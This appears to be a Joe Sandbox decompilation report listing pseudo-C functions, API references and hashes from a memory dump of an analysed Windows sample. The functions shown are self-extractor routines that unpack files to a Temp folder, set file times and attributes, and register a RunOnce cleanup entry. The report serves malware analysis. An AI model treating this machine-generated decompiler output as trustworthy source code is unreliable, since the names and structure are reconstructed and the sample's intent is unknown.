Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
API String ID: 849931509-702805525
Opcode ID: ad90288465000d1b0cfbf8c69e10a243222fea1e8009c0920762b74e7f8ffd59
Instruction ID: 530d7efc2bf426ad190a6a292d50387cc19d1684fa980bdddc68eafd2133f662
Opcode Fuzzy Hash: ad90288465000d1b0cfbf8c69e10a243222fea1e8009c0920762b74e7f8ffd59
Instruction Fuzzy Hash: 92E04F30551318BFEB31AB92EE0AF9B7B6EEB04784F1402A8BA05B0160EB615A18D715

Uniqueness

Uniqueness Score: -1.00%

Function 00EB4CD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00EB4CD0(char* __edx, long _a4, int _a8) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				int _t30;
				long _t32;
				signed int _t33;
				long _t35;
				long _t36;
				struct HWND__* _t37;
				long _t38;
				long _t39;
				long _t41;
				long _t44;
				long _t45;
				long _t46;
				signed int _t50;
				long _t51;
				char* _t58;
				long _t59;
				char* _t63;
				long _t64;
				CHAR* _t71;
				CHAR* _t74;
				int _t75;
				signed int _t76;

				_t69 = __edx;
				_t29 =  *0xeb8004; // 0x92ae1240
				_t30 = _t29 ^ _t76;
				_v8 = _t30;
				_t75 = _a8;
				if( *0xeb91d8 == 0) {
					_t32 = _a4;
					__eflags = _t32;
					if(_t32 == 0) {
						_t33 = E00EB4E99(_t75);
						L35:
						return E00EB6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
					}
					_t35 = _t32 - 1;
					__eflags = _t35;
					if(_t35 == 0) {
						L9:
						_t33 = 0;
						goto L35;
					}
					_t36 = _t35 - 1;
					__eflags = _t36;
					if(_t36 == 0) {
						_t37 =  *0xeb8584; // 0x0
						__eflags = _t37;
						if(_t37 != 0) {
							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
						}
						_t54 = 0xeb91e4;
						_t58 = 0xeb91e4;
						do {
							_t38 =  *_t58;
							_t58 =  &(_t58[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						_t59 = _t58 - 0xeb91e5;
						__eflags = _t59;
						_t71 =  *(_t75 + 4);
						_t73 =  &(_t71[1]);
						do {
							_t39 =  *_t71;
							_t71 =  &(_t71[1]);
							__eflags = _t39;
						} while (_t39 != 0);
						_t69 = _t71 - _t73;
						_t30 = _t59 + 1 + _t71 - _t73;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							L3:
							_t33 = _t30 | 0xffffffff;
							goto L35;
						}
						_t69 = 0xeb91e4;
						_t30 = E00EB4702( &_v268, 0xeb91e4,  *(_t75 + 4));
						__eflags = _t30;
						if(__eflags == 0) {
							goto L3;
						}
						_t41 = E00EB476D( &_v268, __eflags);
						__eflags = _t41;
						if(_t41 == 0) {
							goto L9;
						}
						_push(0x180);
						_t30 = E00EB4980( &_v268, 0x8302); // executed
						_t75 = _t30;
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							goto L3;
						}
						_t30 = E00EB47E0( &_v268);
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						 *0xeb93f4 =  *0xeb93f4 + 1;
						_t33 = _t75;
						goto L35;
					}
					_t44 = _t36 - 1;
					__eflags = _t44;
					if(_t44 == 0) {
						_t54 = 0xeb91e4;
						_t63 = 0xeb91e4;
						do {
							_t45 =  *_t63;
							_t63 =  &(_t63[1]);
							__eflags = _t45;
						} while (_t45 != 0);
						_t74 =  *(_t75 + 4);
						_t64 = _t63 - 0xeb91e5;
						__eflags = _t64;
						_t69 =  &(_t74[1]);
						do {
							_t46 =  *_t74;
							_t74 =  &(_t74[1]);
							__eflags = _t46;
						} while (_t46 != 0);
						_t73 = _t74 - _t69;
						_t30 = _t64 + 1 + _t74 - _t69;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							goto L3;
						}
						_t69 = 0xeb91e4;
						_t30 = E00EB4702( &_v268, 0xeb91e4,  *(_t75 + 4));
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						_t69 =  *((intOrPtr*)(_t75 + 0x18));
						_t30 = E00EB4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						E00EB4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
						__eflags = _t50;
						if(_t50 != 0) {
							_t51 = _t50 & 0x00000027;
							__eflags = _t51;
						} else {
							_t51 = 0x80;
						}
						_t30 = SetFileAttributesA( &_v268, _t51); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						} else {
							_t33 = 1;
							goto L35;
						}
					}
					_t30 = _t44 - 1;
					__eflags = _t30;
					if(_t30 == 0) {
						goto L3;
					}
					goto L9;
				}
				if(_a4 == 3) {
					_t30 = E00EB4B60( *((intOrPtr*)(_t75 + 0x14)));
				}
				goto L3;
			}

0x00eb4cd0
0x00eb4cdb
0x00eb4ce0
0x00eb4ce2
0x00eb4cee
0x00eb4cf2
0x00eb4d0e
0x00eb4d0e
0x00eb4d11
0x00eb4e83
0x00eb4e88
0x00eb4e98
0x00eb4e98
0x00eb4d17
0x00eb4d17
0x00eb4d1a
0x00eb4d2f
0x00eb4d2f
0x00000000
0x00eb4d2f
0x00eb4d1c
0x00eb4d1c
0x00eb4d1f
0x00eb4dcb
0x00eb4dd0
0x00eb4dd2
0x00eb4ddd
0x00eb4ddd
0x00eb4de3
0x00eb4de8
0x00eb4ded
0x00eb4ded
0x00eb4def
0x00eb4df0
0x00eb4df0
0x00eb4df4
0x00eb4df4
0x00eb4df6
0x00eb4df9
0x00eb4dfc
0x00eb4dfc
0x00eb4dfe
0x00eb4dff
0x00eb4dff
0x00eb4e03
0x00eb4e08
0x00eb4e0a
0x00eb4e0f
0x00eb4d03
0x00eb4d03
0x00000000
0x00eb4d03
0x00eb4e18
0x00eb4e20
0x00eb4e25
0x00eb4e27
0x00000000
0x00000000
0x00eb4e33
0x00eb4e38
0x00eb4e3a
0x00000000
0x00000000
0x00eb4e40
0x00eb4e51
0x00eb4e56
0x00eb4e5b
0x00eb4e5e
0x00000000
0x00000000
0x00eb4e6a
0x00eb4e6f
0x00eb4e71
0x00000000
0x00000000
0x00eb4e77
0x00eb4e7d
0x00000000
0x00eb4e7d
0x00eb4d25
0x00eb4d25
0x00eb4d28
0x00eb4d36
0x00eb4d3b
0x00eb4d40
0x00eb4d40
0x00eb4d42
0x00eb4d43
0x00eb4d43
0x00eb4d47
0x00eb4d4a
0x00eb4d4a
0x00eb4d4c
0x00eb4d4f
0x00eb4d4f
0x00eb4d51
0x00eb4d52
0x00eb4d52
0x00eb4d56
0x00eb4d5b
0x00eb4d5d
0x00eb4d62
0x00000000
0x00000000
0x00eb4d67
0x00eb4d6f
0x00eb4d74
0x00eb4d76
0x00000000
0x00000000
0x00eb4d7c
0x00eb4d84
0x00eb4d89
0x00eb4d8b
0x00000000
0x00000000
0x00eb4d94
0x00eb4d99
0x00eb4d9e
0x00eb4da1
0x00eb4daa
0x00eb4daa
0x00eb4da3
0x00eb4da3
0x00eb4da3
0x00eb4db5
0x00eb4dbb
0x00eb4dbd
0x00000000
0x00eb4dc3
0x00eb4dc5
0x00000000
0x00eb4dc5
0x00eb4dbd
0x00eb4d2a
0x00eb4d2a
0x00eb4d2d
0x00000000
0x00000000
0x00000000
0x00eb4d2d
0x00eb4cf8
0x00eb4cfd
0x00eb4d02
0x00000000

APIs

SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00EB4DB5
SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00EB4DDD

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00EB4D36, 00EB4DE3

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: AttributesFileItemText
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 3625706803-388467436
Opcode ID: 4ec270bce5051fa47b6127ac832f8f66670493e33272013163029e84314d76e2
Instruction ID: e41464ba922ea05dbcb77ab645ecd7a2048c0ddd4c18347e2e819d1a5c80ee5f
Opcode Fuzzy Hash: 4ec270bce5051fa47b6127ac832f8f66670493e33272013163029e84314d76e2
Instruction Fuzzy Hash: AC4113B62001068BCF229F38DD546F7B3A5EB45308F046A69E882B72D7DE31DE4AC750

Uniqueness

Uniqueness Score: -1.00%

Function 00EB4C37 Relevance: 4.5, APIs: 3, Instructions: 39
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00EB4C37(signed int __ecx, int __edx, int _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				FILETIME* _t14;
				int _t15;
				signed int _t21;

				_t21 = __ecx * 0x18;
				if( *((intOrPtr*)(_t21 + 0xeb8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
					L5:
					return 0;
				} else {
					_t14 =  &_v12;
					_t15 = SetFileTime( *(_t21 + 0xeb8d74), _t14, _t14, _t14); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 1;
				}
			}

0x00eb4c40
0x00eb4c4a
0x00eb4c8d
0x00000000
0x00eb4c70
0x00eb4c70
0x00eb4c7e
0x00eb4c86
0x00000000
0x00000000
0x00000000
0x00eb4c8a

APIs

DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00EB4C54
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00EB4C66
SetFileTime.KERNELBASE(?,?,?,?), ref: 00EB4C7E

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: Time$File$DateLocal
String ID:
API String ID: 2071732420-0
Opcode ID: 37a12ce84d371541cb53ee0883ce139460ea6ae65d5fadf26e05909ba1781239
Instruction ID: 2c4f70a65a1c0563aad1baa3d3f28a6de98875b21a2830c2f05cacfc7a420da1
Opcode Fuzzy Hash: 37a12ce84d371541cb53ee0883ce139460ea6ae65d5fadf26e05909ba1781239
Instruction Fuzzy Hash: 52F096B250110D6FAF25DFB5CC48DFBBBADEB04644B44063BA915F1091EA30D914CB70

Uniqueness

Uniqueness Score: -1.00%

Function 00EB487A Relevance: 3.1, APIs: 2, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00EB487A(CHAR* __ecx, signed int __edx) {
				void* _t7;
				CHAR* _t11;
				long _t18;
				long _t23;

				_t11 = __ecx;
				asm("sbb edi, edi");
				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
				if((__edx & 0x00000100) == 0) {
					asm("sbb esi, esi");
					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
				} else {
					if((__edx & 0x00000400) == 0) {
						asm("sbb esi, esi");
						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
					} else {
						_t23 = 1;
					}
				}
				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
				if(_t7 != 0xffffffff || _t23 == 3) {
					return _t7;
				} else {
					E00EB490C(_t11);
					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
				}
			}

0x00eb4880
0x00eb488c
0x00eb4894
0x00eb48a0
0x00eb48c9
0x00eb48ce
0x00eb48a2
0x00eb48a8
0x00eb48b7
0x00eb48bc
0x00eb48aa
0x00eb48ac
0x00eb48ac
0x00eb48a8
0x00eb48de
0x00eb48e7
0x00eb490b
0x00eb48ee
0x00eb48f0
0x00000000
0x00eb4902

APIs

CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00EB4A23,?,00EB4F67,*MEMCAB,00008000,00000180), ref: 00EB48DE
CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00EB4F67,*MEMCAB,00008000,00000180), ref: 00EB4902

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: cbc80d915b92b001f3875163793a2767450ea9730ffdaae4fb6082061d53eeff
Instruction ID: d32d353eba0ade80d90dadb62fa858817077f0cce044e5e80dcc9eba7b28d53b
Opcode Fuzzy Hash: cbc80d915b92b001f3875163793a2767450ea9730ffdaae4fb6082061d53eeff
Instruction Fuzzy Hash: 3C0124E3E126712AF62950298C88FF7555CCBD6638F1A2335BDAAB62D2D5644C0482E0

Uniqueness

Uniqueness Score: -1.00%

Function 00EB4AD0 Relevance: 3.0, APIs: 2, Instructions: 47
fileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00EB4AD0(signed int _a4, void* _a8, long _a12) {
				signed int _t9;
				int _t12;
				signed int _t14;
				signed int _t15;
				void* _t20;
				struct HWND__* _t21;
				signed int _t24;
				signed int _t25;

				_t20 =  *0xeb858c; // 0x270
				_t9 = E00EB3680(_t20);
				if( *0xeb91d8 == 0) {
					_push(_t24);
					_t12 = WriteFile( *(0xeb8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
					if(_t12 != 0) {
						_t25 = _a12;
						if(_t25 != 0xffffffff) {
							_t14 =  *0xeb9400; // 0x8f800
							_t15 = _t14 + _t25;
							 *0xeb9400 = _t15;
							if( *0xeb8184 != 0) {
								_t21 =  *0xeb8584; // 0x0
								if(_t21 != 0) {
									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xeb93f8, 0);
								}
							}
						}
					} else {
						_t25 = _t24 | 0xffffffff;
					}
					return _t25;
				} else {
					return _t9 | 0xffffffff;
				}
			}

0x00eb4ad5
0x00eb4adb
0x00eb4ae7
0x00eb4aee
0x00eb4b05
0x00eb4b0d
0x00eb4b14
0x00eb4b1a
0x00eb4b1c
0x00eb4b21
0x00eb4b2a
0x00eb4b2f
0x00eb4b31
0x00eb4b39
0x00eb4b54
0x00eb4b54
0x00eb4b39
0x00eb4b2f
0x00eb4b0f
0x00eb4b0f
0x00eb4b0f
0x00eb4b5e
0x00eb4ae9
0x00eb4aed
0x00eb4aed

APIs

Part of subcall function 00EB3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00EB369F
Part of subcall function 00EB3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00EB36B2
Part of subcall function 00EB3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00EB36DA

WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00EB4B05

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: MessagePeek$FileMultipleObjectsWaitWrite
String ID:
API String ID: 1084409-0
Opcode ID: 26b260d71c434e2b72e1a0e8a4535ddab730c8a0cd4c93c17fa2be99b39b565d
Instruction ID: 1e9d3164e9f83e1e20cf0e786ca481480571e92a0b39172b6323fa3579d6686f
Opcode Fuzzy Hash: 26b260d71c434e2b72e1a0e8a4535ddab730c8a0cd4c93c17fa2be99b39b565d
Instruction Fuzzy Hash: BF018071201201AFDB158F6AEC55BE37759AB44729F149326FA39B72E2CB70D815CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00EB658A Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00EB658A(char* __ecx, void* __edx, char* _a4) {
				intOrPtr _t4;
				char* _t6;
				char* _t8;
				void* _t10;
				void* _t12;
				char* _t16;
				intOrPtr* _t17;
				void* _t18;
				char* _t19;

				_t16 = __ecx;
				_t10 = __edx;
				_t17 = __ecx;
				_t1 = _t17 + 1; // 0xeb8b3f
				_t12 = _t1;
				do {
					_t4 =  *_t17;
					_t17 = _t17 + 1;
				} while (_t4 != 0);
				_t18 = _t17 - _t12;
				_t2 = _t18 + 1; // 0xeb8b40
				if(_t2 < __edx) {
					_t19 = _t18 + __ecx;
					if(_t19 > __ecx) {
						_t8 = CharPrevA(__ecx, _t19); // executed
						if( *_t8 != 0x5c) {
							 *_t19 = 0x5c;
							_t19 =  &(_t19[1]);
						}
					}
					_t6 = _a4;
					 *_t19 = 0;
					while( *_t6 == 0x20) {
						_t6 = _t6 + 1;
					}
					return E00EB16B3(_t16, _t10, _t6);
				}
				return 0x8007007a;
			}

0x00eb6592
0x00eb6594
0x00eb6596
0x00eb6598
0x00eb6598
0x00eb659b
0x00eb659b
0x00eb659d
0x00eb659e
0x00eb65a2
0x00eb65a4
0x00eb65a9
0x00eb65b2
0x00eb65b6
0x00eb65ba
0x00eb65c3
0x00eb65c5
0x00eb65c8
0x00eb65c8
0x00eb65c3
0x00eb65c9
0x00eb65cc
0x00eb65d2
0x00eb65d1
0x00eb65d1
0x00000000
0x00eb65dc
0x00000000

APIs

CharPrevA.USER32(00EB8B3E,00EB8B3F,00000001,00EB8B3E,-00000003,?,00EB60EC,00EB1140,?), ref: 00EB65BA

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: CharPrev
String ID:
API String ID: 122130370-0
Opcode ID: b6c4045ea792b4577c2dc8428838f2b8d749ba652f4ecfd90dc40bcfdcc2cdb9
Instruction ID: 947a0946ce59cf559adedfb4af84fe99512aa7f3332d7f1d058cbcef0fc9b816
Opcode Fuzzy Hash: b6c4045ea792b4577c2dc8428838f2b8d749ba652f4ecfd90dc40bcfdcc2cdb9
Instruction Fuzzy Hash: 50F04C321052509FD731091D9884BE7BFDEDB86350F28196EE9DAF3249CA6D8C5683A0

Uniqueness

Uniqueness Score: -1.00%

Function 00EB621E Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00EB621E() {
				signed int _v8;
				char _v268;
				signed int _t5;
				void* _t9;
				void* _t13;
				void* _t19;
				void* _t20;
				signed int _t21;

				_t5 =  *0xeb8004; // 0x92ae1240
				_v8 = _t5 ^ _t21;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					0x4f0 = 2;
					_t9 = E00EB597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
				} else {
					E00EB44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
					 *0xeb9124 = E00EB6285();
					_t9 = 0;
				}
				return E00EB6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
			}

0x00eb6229
0x00eb6230
0x00eb6247
0x00eb626a
0x00eb6272
0x00eb6249
0x00eb6255
0x00eb625f
0x00eb6264
0x00eb6264
0x00eb6284

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00EB623F

Part of subcall function 00EB44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00EB4518
Part of subcall function 00EB44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00EB4554

Part of subcall function 00EB6285: GetLastError.KERNEL32(00EB5BBC), ref: 00EB6285

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: DirectoryErrorLastLoadMessageStringWindows
String ID:
API String ID: 381621628-0
Opcode ID: e6ad87c6a67d3b0e7313e2095b490385a12eb261e2f2f0be9bdef748efca9d9b
Instruction ID: 5f1345057b1ccba1d7a5fdd7f58dc7e8133679ecb998a7caf26f28e7e120b733
Opcode Fuzzy Hash: e6ad87c6a67d3b0e7313e2095b490385a12eb261e2f2f0be9bdef748efca9d9b
Instruction Fuzzy Hash: 8BF0B4B07002086FE750EB749D02BFB76ECDB44700F400069AA85F6192ED789D448650

Uniqueness

Uniqueness Score: -1.00%

Function 00EB4B60 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00EB4B60(signed int _a4) {
				signed int _t9;
				signed int _t15;

				_t15 = _a4 * 0x18;
				if( *((intOrPtr*)(_t15 + 0xeb8d64)) != 1) {
					_t9 = FindCloseChangeNotification( *(_t15 + 0xeb8d74)); // executed
					if(_t9 == 0) {
						return _t9 | 0xffffffff;
					}
					 *((intOrPtr*)(_t15 + 0xeb8d60)) = 1;
					return 0;
				}
				 *((intOrPtr*)(_t15 + 0xeb8d60)) = 1;
				 *((intOrPtr*)(_t15 + 0xeb8d68)) = 0;
				 *((intOrPtr*)(_t15 + 0xeb8d70)) = 0;
				 *((intOrPtr*)(_t15 + 0xeb8d6c)) = 0;
				return 0;
			}

0x00eb4b66
0x00eb4b74
0x00eb4b98
0x00eb4ba0
0x00000000
0x00eb4bac
0x00eb4ba4
0x00000000
0x00eb4ba4
0x00eb4b78
0x00eb4b7e
0x00eb4b84
0x00eb4b8a
0x00000000

APIs

FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00EB4FA1,00000000), ref: 00EB4B98

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: bee3d6c05e091c9f6c9a2d90876d7ed16a7edf49dc5bf152a1bd13c13a6c0177
Instruction ID: 4b0c5321d34d16a568300fd865e0ff61fab51bf95c6ada98432de030613ba9c4
Opcode Fuzzy Hash: bee3d6c05e091c9f6c9a2d90876d7ed16a7edf49dc5bf152a1bd13c13a6c0177
Instruction Fuzzy Hash: D8F01271504B089E8B718F7ACD44693BBEEAB953603101F2F95AEF22D1DF30A841CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00EB66AE Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00EB66AE(CHAR* __ecx) {
				unsigned int _t1;

				_t1 = GetFileAttributesA(__ecx); // executed
				if(_t1 != 0xffffffff) {
					return  !(_t1 >> 4) & 0x00000001;
				} else {
					return 0;
				}
			}

0x00eb66b1
0x00eb66ba
0x00eb66c7
0x00eb66bc
0x00eb66be
0x00eb66be

APIs

GetFileAttributesA.KERNELBASE(?,00EB4777,?,00EB4E38,?), ref: 00EB66B1

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 9a54eb59d8b242611619d63166ada77d1b30c392395b8e75a37d093f1a58413e
Instruction ID: 7e2a19a53c329e1b6905dd491de625736b216f607e7d74ca5b37e097c5d2bea3
Opcode Fuzzy Hash: 9a54eb59d8b242611619d63166ada77d1b30c392395b8e75a37d093f1a58413e
Instruction Fuzzy Hash: 5FB0927622244056AE2017326C2A5A72941A7C123ABE82BA0F136E01E4CA3EC84AD004

Uniqueness

Uniqueness Score: -1.00%

Function 00EB4CA0 Relevance: 1.3, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00EB4CA0(long _a4) {
				void* _t2;

				_t2 = GlobalAlloc(0, _a4); // executed
				return _t2;
			}

0x00eb4caa
0x00eb4cb1

APIs

GlobalAlloc.KERNELBASE(00000000,?), ref: 00EB4CAA

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: b6c2d78e5a2c29932ec42ee075d6bdd3397d1cb1aae5a3e1cb59d9227521e2e8
Instruction ID: 6c064179adfad17e1862d60c92abad5e69b3040f8d58cec332399217eb82bee0
Opcode Fuzzy Hash: b6c2d78e5a2c29932ec42ee075d6bdd3397d1cb1aae5a3e1cb59d9227521e2e8
Instruction Fuzzy Hash: FDB0123204420CBBCF012FC3EC09F863F1DE7C4761F180010F60C450508AB294108696

Uniqueness

Uniqueness Score: -1.00%

Function 00EB4CC0 Relevance: 1.3, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00EB4CC0(void* _a4) {
				void* _t2;

				_t2 = GlobalFree(_a4); // executed
				return _t2;
			}

0x00eb4cc8
0x00eb4ccf

